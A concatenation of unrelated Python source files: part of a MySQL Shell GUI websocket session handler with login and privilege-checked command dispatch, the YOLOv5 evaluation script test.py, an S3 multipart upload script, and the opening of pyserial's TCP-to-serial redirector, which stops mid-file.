'sha256', json_msg['password'].encode(), salt.encode(), 100000).hex()
if self.is_local_session or row[1] == password_hash + salt:
with self.db_tx() as db:
db.execute('UPDATE session SET user_id=? WHERE uuid=?',
(row['id'], self.session_uuid))
self._session_user_id = row[0]
self._session_user_personal_group_id = get_id_personal_user_group(
db, self._session_user_id)
# get default profile for the user
default_profile = gui.users.get_default_profile(
row[0], WebSession(self))
if default_profile["request_state"]["type"] != "OK":
msg = default_profile["request_state"]["msg"]
raise Exception(f'Could not get the default profile for'
f' the user. {msg}')
self.set_active_profile_id(
default_profile["result"]["id"])
values = {"active_profile": default_profile["result"]}
self.send_response_message('OK',
f'User {username} was '
f'successfully authenticated.',
request_id, values)
# TODO
# Update web_session with self.session_user_id
# TODO
# Cache the user's privileges
else:
# raise Exception(f'The given password for user '
# f'{json_msg.get("username")} is incorrect.')
raise Exception('Incorrect username or password')
else:
# raise Exception(f'There is no user account with the name '
# f'{json_msg.get("username")}.')
raise Exception('Incorrect username or password')
except Exception as e:
error_msg = f'User could not be authenticated. {str(e)}.'
logger.exception(error_msg)
self.send_response_message('ERROR', error_msg, request_id)
def execute_command_request(self, json_msg):
request_id = json_msg.get('request_id')
try:
if not request_id:
raise Exception('No request_id given. '
'Please provide the request_id.')
cmd = json_msg.get('command')
if not cmd:
raise Exception(
'No command given. Please provide the command.')
# Check if user is allowed to execute this command
allowed = False
res = self.db.execute(
'''SELECT p.name, p.access_pattern
FROM privilege p
INNER JOIN role_has_privilege r_p
ON p.id = r_p.privilege_id
INNER JOIN user_has_role u_r
ON r_p.role_id = u_r.role_id
WHERE u_r.user_id = ? AND p.privilege_type_id = 1''',
(self.session_user_id,)).fetch_all()
for row in res:
p = re.compile(row[1])
m = p.match(cmd)
if not m:
raise Exception(f'This user account has no privileges to '
f'execute the command {cmd}')
allowed = True
break
if not allowed:
raise Exception(f'This user does not have the necessary '
f'privileges to execute the command {cmd}.')
# Argument need to be passed in a dict using the argument names as
# the keys
args = json_msg.get('args', {})
kwargs = json_msg.get('kwargs', {})
kwargs = { **args, **kwargs }
v = kwargs.get('value')
if v and type(v) == dict:
# TODO: Check why a dict cannot be passed as it makes the
# shell error out
kwargs.update({"value": json.dumps(v)})
# Inspect the function arguments and check if there are arguments
# named user_id, profile_id, web_session, request_id,
# module_session, async_web_session or session.
# If so, replace them with session variables
f_args = []
# Loop over all chained objects/functions of the given cmd and find
# the function to call
matches = re.findall(r'(\w+)\.', cmd + '.')
mod = None
mod_name = None
parent_obj = None
parent_obj_name = None
func = None
if len(matches) < 2:
raise Exception(
f"The command '{cmd}' is using wrong format. "
"Use <global>[.<object>]*.<function>")
# Last entry is a function name
function_name = matches[-1]
# Rest is a chain of objects
objects = matches[:-1]
found_objects = []
# Selects the parent object
if objects[0] == 'gui':
parent_obj = gui
objects = objects[1:]
found_objects.append('gui')
else:
parent_obj = mysqlsh.globals
# Searches the object hierarchy
for object in objects:
try:
child = getattr(parent_obj, object)
# Set the parent_obj for the next object evaluation
parent_obj = child
found_objects.append(object)
except:
if len(found_objects) == 0:
raise Exception(
f"The '{object}' global object does not exist")
else:
raise Exception(
f"Object '{'.'.join(found_objects)}' has no member named '{object}'")
# Searches the target function
try:
func = getattr(parent_obj, function_name)
except:
raise Exception(
f"Object '{'.'.join(found_objects)}' has no member function named '{function_name}'")
f_args = {}
if func:
f_args = self.get_function_arguments(
func=func, mod=parent_obj, mod_cmd=function_name)
if "user_id" in f_args:
# Return error if user_id does not match self.session_user_id
if self.session_user_id is None or "user_id" not in kwargs \
or kwargs["user_id"] != self.session_user_id:
raise Exception(f'The function argument user_id must not '
f'be set to a different user_id than the '
f'one used in the '
f'authenticated session.')
kwargs.update({"user_id": self.session_user_id})
if "profile_id" in f_args:
if "profile_id" not in kwargs:
kwargs.update({"profile_id":
self.session_active_profile_id})
if "web_session" in f_args:
kwargs.update({"web_session": WebSession(self)})
if "request_id" in f_args:
kwargs.update({"request_id": request_id})
if "interactive" in f_args:
kwargs.update({"interactive": False})
if "session" in f_args:
from gui_plugin.core.modules.DbModuleSession import DbModuleSession
from gui_plugin.core.dbms.DbMySQLSession import DbMysqlSession
# If the called function requires a session parameter,
# get it from the given module_session
if not 'module_session_id' in kwargs:
raise Exception(
f'The function {cmd} requires the module_session_id '
'argument to be set.')
module_session = self.get_module_session_object(
kwargs['module_session_id'])
if not isinstance(module_session, DbModuleSession):
raise Exception(
f'The function {cmd} needs a module_session_id '
'argument set to a DbModuleSession.')
db_module_session = module_session._db_service_session
if not isinstance(db_module_session, DbMysqlSession):
raise Exception(
f'The function {cmd} needs a module_session_id '
'argument set to a DbModuleSession using MySQL.')
kwargs.update({"session": db_module_session.session})
del kwargs['module_session_id']
module_session = None
if "module_session" in f_args:
if "module_session_id" not in kwargs:
raise Exception('No module_session_id given. Please '
'provide the module_session_id.')
# swap 'module_session_id' with 'module_session'
module_session = self.get_module_session_object(
kwargs['module_session_id'])
kwargs.update({"module_session": module_session})
del kwargs['module_session_id']
# if the function has an async_web_session argument it needs to be
# run in a separate thread and communication with the web_session
# thread needs to be synchronized
if "async_web_session" in f_args:
kwargs.update({"async_web_session": WebSession(self)})
res = {"request_state":
{'type': 'PENDING',
'msg': 'Async execution has been started'}}
# execute command in its own thread
thread = threading.Thread(target=func, kwargs=kwargs)
thread.name = f'req-{request_id}'
thread.start()
elif found_objects[0] != 'gui':
thread = RequestHandler(request_id, func, kwargs, self)
thread.start()
result = None
else:
result = func(**kwargs)
except Exception as e:
logger.exception(e)
result = Response.exception(e)
if result is not None:
self.send_command_response(request_id, result)
def get_function_arguments(self, func, mod, mod_cmd):
try:
# try to use the regular inspection function to get the function
# arguments
sig = inspect.signature(func)
f_args = [p.name for p in sig.parameters.values()]
except: # pragma: no cover
# if that fails, fall back to parsing the help output of that
# function
help_func = getattr(mod, 'help')
help_output = help_func(f'{mod_cmd}')
match = re.match(r'(.|\s)*?SYNTAX(.|\s)*?\(([\w,\[\]\s]*)',
help_output, flags=re.MULTILINE)
arguments = match[3].replace('[', '').replace(']', '').\
replace('\n', '').replace(' ', '')
f_args = arguments.split(",")
# Include the kwargs
if 'kwargs' in f_args:
f_args.remove('kwargs')
desc_idx = help_output.find(
'The kwargs parameter accepts the following options:')
desc = help_output[desc_idx + 53:]
matches = re.findall(r'-\s(\w*)\:', desc, flags=re.MULTILINE)
for match in matches:
f_args.append(match)
return f_args
def register_module_session(self, module_session):
self._module_sessions[module_session.module_session_id] = module_session
def unregister_module_session(self, module_session):
if module_session.module_session_id in self._module_sessions:
# If we close module we need also clean up requests registry for that module
with self._requests_mutex:
self._requests = {k: v for k, v in self._requests.items(
) if v != module_session.module_session_id}
del self._module_sessions[module_session.module_session_id]
def register_module_request(self, request_id, module_session_id):
with self._requests_mutex:
self._requests[request_id] = module_session_id
def unregister_module_request(self, request_id):
with self._requests_mutex:
if request_id in self._requests:
del self._requests[request_id]
def cancel_request(self, json_msg):
request_id = json_msg.get('request_id')
try:
if not request_id:
raise Exception('No request_id given. '
'Please provide the request_id.')
module_session = self.get_module_session_object(
self._requests[request_id])
if not hasattr(module_session, 'cancel_request'):
raise Exception(
f"Module {type(module_session)} doesn't support cancel_request.")
module_session.cancel_request(request_id)
self.send_response_message('OK', 'Request cancelled.', request_id)
except Exception as e:
logger.error(e)
self.send_response_message('ERROR', str(e).strip(), request_id)
def send_prompt_response(self, request_id, prompt, handler):
self._prompt_handlers[request_id] = handler
self.send_response_message("PENDING",
'Executing...',
request_id,
prompt,
api=True)
def prompt_reply(self, json_msg):
request_id = json_msg.get('request_id')
try:
if not request_id:
raise Exception('No request_id given. '
'Please provide the request_id.')
prompt_handler = self._prompt_handlers.pop(request_id)
prompt_handler.process_prompt_reply(json_msg)
except KeyError as e:
logger.error(e)
self.send_response_message(
'ERROR', f'Unexpected prompt for request_id=\'{request_id}\'')
except Exception as e:
logger.error(e)
self.send_response_message('ERROR', str(e).strip(), request_id)
class WebSession():
def __init__(self, shell_gui_web_socket_hander):
self._socket_handler = shell_gui_web_socket_hander
self._db = None
@property
def db(self):
# if the db object has not yet been initialized for this websession
if not self._db:
# open the database connection for this thread
self._db = self._socket_handler.db
return self._db
@property
def user_id(self):
return self._socket_handler._session_user_id
@property
def user_personal_group_id(self):
return self._socket_handler._session_user_personal_group_id
@property
def session_uuid(self):
return self._socket_handler.session_uuid
@property
def is_local_session(self):
return self._socket_handler.is_local_session
def send_response_message(self, msg_type, msg, request_id=None,
values=None, api=False):
if self._socket_handler:
self._socket_handler.send_response_message(msg_type, msg,
request_id=request_id,
values=values,
api=api)
def send_command_response(self, request_id, values):
if self._socket_handler:
self._socket_handler.send_command_response(request_id, values)
def register_module_session(self, module_session):
if self._socket_handler:
self._socket_handler.register_module_session(module_session)
def unregister_module_session(self, module_session):
if self._socket_handler:
self._socket_handler.unregister_module_session(module_session)
def get_module_session_object(self, module_session_id):
if self._socket_handler:
return self._socket_handler.get_module_session_object(module_session_id)
def set_active_profile_id(self, profile_id):
if self._socket_handler:
self._socket_handler.set_active_profile_id(profile_id)
@property
def session_active_profile_id(self):
if self._socket_handler:
return self._socket_handler.session_active_profile_id
def register_module_request(self, request_id, module_session_id):
if self._socket_handler:
self._socket_handler.register_module_request(
request_id, module_session_id)
def unregister_module_request(self, request_id):
if self._socket_handler:
self._socket_handler.unregister_module_request(request_id)
def send_prompt_response(self, request_id, prompt, handler):
if self._socket_handler:
self._socket_handler.send_prompt_response(
request_id, prompt, handler)
|
test.py
|
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
wandb_logger=None,
compute_loss=None,
half_precision=True,
is_coco=False,
opt=None):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' and half_precision # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
if isinstance(data, str):
is_coco = data.endswith('coco.yaml')
with open(data) as f:
data = yaml.safe_load(f)
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs = 0
if wandb_logger and wandb_logger.wandb:
log_imgs = min(wandb_logger.log_imgs, 100)
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = opt.task if opt.task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, opt, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
out = non_max_suppression(out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb, multi_label=True)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging - Media Panel Plots
if len(wandb_images) < log_imgs and wandb_logger.current_epoch > 0: # Check for test operation
if wandb_logger.current_epoch % wandb_logger.bbox_interval == 0:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb_logger.wandb.Image(img[si], boxes=boxes, caption=path.name))
wandb_logger.log_training_progress(predn, path, names) if wandb_logger and wandb_logger.wandb_run else None
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12i' * 2 + '%12.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb_logger and wandb_logger.wandb:
val_batches = [wandb_logger.wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
wandb_logger.log({"Validation": val_batches})
if wandb_images:
wandb_logger.log({"Bounding Box Debugger/Images": wandb_images})
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ('train', 'val', 'test'): # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
opt=opt
)
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights:
test(opt.data, w, opt.batch_size, opt.img_size, 0.25, 0.45, save_json=False, plots=False, opt=opt)
elif opt.task == 'study': # run over a range of settings and save/plot
# python test.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = test(opt.data, w, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False, opt=opt)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
|
multipartupload.py
|
import argparse
import boto3
import json
import multiprocessing
# Starts Multipart Upload
def start_upload(bucket, key):
boto3.setup_default_session(profile_name='cloudguru')
s3_client = boto3.client('s3')
response = s3_client.create_multipart_upload(
Bucket = bucket,
Key = key
)
return response['UploadId']
# Add upload part
def add_part(proc_queue, body, bucket, key, part_number, upload_id):
s3_client = boto3.client('s3')
response = s3_client.upload_part(
Body = body,
Bucket = bucket,
Key = key,
PartNumber = part_number,
UploadId = upload_id
)
print(f"Finished Part: {part_number}, ETag: {response['ETag']}")
proc_queue.put({'PartNumber': part_number, 'ETag': response['ETag']})
return
# End Multipart Upload
def end_upload(bucket, key, upload_id, finished_parts):
s3_client = boto3.client('s3')
response = s3_client.complete_multipart_upload(
Bucket = bucket,
Key = key,
MultipartUpload={
'Parts': finished_parts
},
UploadId = upload_id
)
return response
# Primary logic
def main():
ap = argparse.ArgumentParser()
ap.add_argument('-f', '--file', required = True, help = "File to be chunked and uploaded")
ap.add_argument('-k', '--key', help = "Key for destination object")
ap.add_argument('-b', '--bucket', required = True, help = "Destination bucket")
ap.add_argument('-cs', '--chunk_size', required = True, type = int, choices = range(5,101), metavar = '[5-100]', help = "Chunk size in MB, must be > 5MiB")
ap.add_argument('-p', '--processes', type = int, choices = range(1,256), metavar = '[1-256]', default = 10, help = "Number of upload processes to run simultaneously")
args = vars(ap.parse_args())
if args['key'] in [None, '']:
args['key'] = args['file']
file = args['file']
key = args['key']
bucket = args['bucket']
sim_proc = args['processes']
upload_id = start_upload(bucket, key)
print(f'Starting upload: {upload_id}')
file_upload = open(file, 'rb')
part_procs = []
proc_queue = multiprocessing.Queue()
queue_returns = []
chunk_size = (args['chunk_size'] * 1024) * 1024
part_num = 1
chunk = file_upload.read(chunk_size)
while len(chunk) > 0:
proc = multiprocessing.Process(target=add_part, args=(proc_queue, chunk, bucket, key, part_num, upload_id))
part_procs.append(proc)
part_num += 1
chunk = file_upload.read(chunk_size)
part_procs = [part_procs[i * sim_proc:(i +1) * sim_proc] for i in range((len(part_procs) + (sim_proc - 1)) // sim_proc)]
for i in range(len(part_procs)):
for p in part_procs[i]:
p.start()
for p in part_procs[i]:
p.join()
for p in part_procs[i]:
queue_returns.append(proc_queue.get())
queue_returns = sorted(queue_returns, key = lambda i: i['PartNumber'])
response = end_upload(bucket, key, upload_id, queue_returns)
print(json.dumps(response, sort_keys=True, indent=4))
if __name__ == '__main__':
main()
|
tcp_serial_redirect.py
|
#!/usr/bin/env python
# (C) 2002-2009 Chris Liechti <cliechti@gmx.net>
# redirect data from a TCP/IP connection to a serial port and vice versa
# requires Python 2.2 'cause socket.sendall is used
import sys
import os
import time
import threading
import socket
import codecs
import serial
try:
True
except NameError:
True = 1
False = 0
class Redirector:
def __init__(self, serial_instance, socket, ser_newline=None, net_newline=None, spy=False):
self.serial = serial_instance
self.socket = socket
self.ser_newline = ser_newline
self.net_newline = net_newline
self.spy = spy
self._write_lock = threading.Lock()
def shortcut(self):
"""connect the serial port to the TCP port by copying everything
from one side to the other"""
self.alive = True
self.thread_read = threading.Thread(target=self.reader)
self.thread_read.setDaemon(True)
self.thread_read.setName('serial->socket')
self.thread_read.start()
self.writer()
def reader(self):
"""loop forever and copy serial->socket"""
while self.alive:
try:
data = self.serial.read(1) # read one, blocking
n = self.serial.inWaiting() # look if there is more
if n:
data = data + self.serial.read(n) # and get as much as possible
if data:
# the spy shows what's on the serial port, so log it before converting newlines
if self.spy:
sys.stdout.write(codecs.escape_encode(data)[0])
sys.stdout.flush()
if self.ser_newline and self.net_newline:
# do the newline conversion
# XXX fails for CR+LF in input when it is cut in half at the begin or end of the string
data = net_newline.join(data.split(ser_newline))
# escape outgoing data when needed (Telnet IAC (0xff) character)
self._write_lock.acquire()
try:
self.socket.sendall(data) # send it over TCP
finally:
self._write_lock.release()
except socket.error, msg:
sys.stderr.write('ERROR: %s\n' % msg)
# probably got disconnected
break
self.alive = False
def write(self, data):
"""thread safe socket write with no data escaping. used to send telnet stuff"""
self._write_lock.acquire()
try:
self.socket.sendall(data)
finally:
self._write_lock.release()
def writer(self):
"""loop forever and copy socket->serial"""
while self.alive:
try:
data = self.socket.recv(1024)
if not data:
break
if self.ser_newline and self.net_newline:
# do the newline conversion
# XXX fails for CR+LF in input when it is cut in half at the begin or end of the string
data = ser_newline.join(data.split(net_newline))
self.serial.write(data) # get a bunch of bytes and send them
# the spy shows what's on the serial port, so log it after converting newlines
if self.spy:
sys.stdout.write(codecs.escape_encode(data)[0])
sys.stdout.flush()
except socket.error, msg:
sys.stderr.write('ERROR: %s\n' % msg)
# probably got disconnected
break
self.alive = False
self.thread_read.join()
def stop(self):
"""Stop copying"""
if self.alive:
self.alive = False
self.thread_read.join()
if __name__ == '__main__':
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] [port [baudrate]]",
description = "Simple Serial to Network (TCP/IP) redirector.",
epilog = """\
NOTE: no security measures are implemented. Anyone can remotely connect
to this service over the network.
Only one connection at once is supported. When the connection is terminated
it waits for the next connect.
""")
parser.add_option("-q", "--quiet",
dest = "quiet",
action = "store_true",
help = "suppress non error messages",
default = False
)
parser.add_option("--spy",
dest = "spy",
action = "store_true",
help = "peek at the communication and print all data to the console",
default = False
)
group = optparse.OptionGroup(parser,
"Serial Port",
"Serial port settings"
)
parser.add_option_group(group)
group.add_option("-p", "--port",
dest = "port",
help = "port, a number (default 0) or a device name",
default = None
)
group.add_option("-b", "--baud",
dest = "baudrate",
action = "store",
type = 'int',
help = "set baud rate, default: %default",
default = 9600
)
group.add_option("", "--parity",
dest = "parity",
action = "store",
help = "set parity, one of [N, E, O], default=%default",
default = 'N'
)
group.add_option("--rtscts",
dest = "rtscts",
action = "store_true",
help = "enable RTS/CTS flow control (default off)",
default = False
)
group.add_option("--xonxoff",
dest = "xonxoff",
action = "store_true",
help = "enable software flow control (default off)",
default = False
)
group.add_option("--rts",
dest = "rts_state",
action = "store",
type = 'int',
help = "set initial RTS line state (possible values: 0, 1)",
default = None
)
group.add_option("--dtr",
dest = "dtr_state",
action = "store",
type = 'int',
help = "set initial DTR line state (possible values: 0, 1)",
default = None
)
group = optparse.OptionGroup(parser,
"Network settings",
"Network configuration."
)
parser.add_option_group(group)
group.add_option("-P", "--localport",
dest = "local_port",
action = "store",
type = 'int',
help = "local TCP port",
default = 7777
)
group = optparse.OptionGroup(parser,
"Newline Settings",
"Convert newlines between network and serial port. Conversion is normally disabled and can be enabled by --convert."
)
parser.add_option_group(group)
group.add_option("-c", "--convert",
dest = "convert",
action = "store_true",
help = "enable newline conversion (default off)",
default = False
)
group.add_option("--net-nl",
dest = "net_newline",
action = "store",
help = "type of newlines that are expected on the network (default: %default)",
default = "LF"
)
group.add_option("--ser-nl",
dest = "ser_newline",
action = "store",
help = "type of newlines that are expected on the serial port (default: %default)",
default = "CR+LF"
)
(options, args) = parser.parse_args()
# get port and baud rate from command line arguments or the option switches
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
if port is None: port = 0
# check newline modes for network connection
mode = options.net_newline.upper()
if mode == 'CR':
net_newline = '\r'
elif mode == 'LF':
net_newline = '\n'
elif mode == 'CR+LF' or mode == 'CRLF':
net_newline = '\r\n'
else:
parser.error("Invalid value for --net-nl. Valid are 'CR', 'LF' and 'CR+LF'/'CRLF'.")
# check newline modes for serial connection
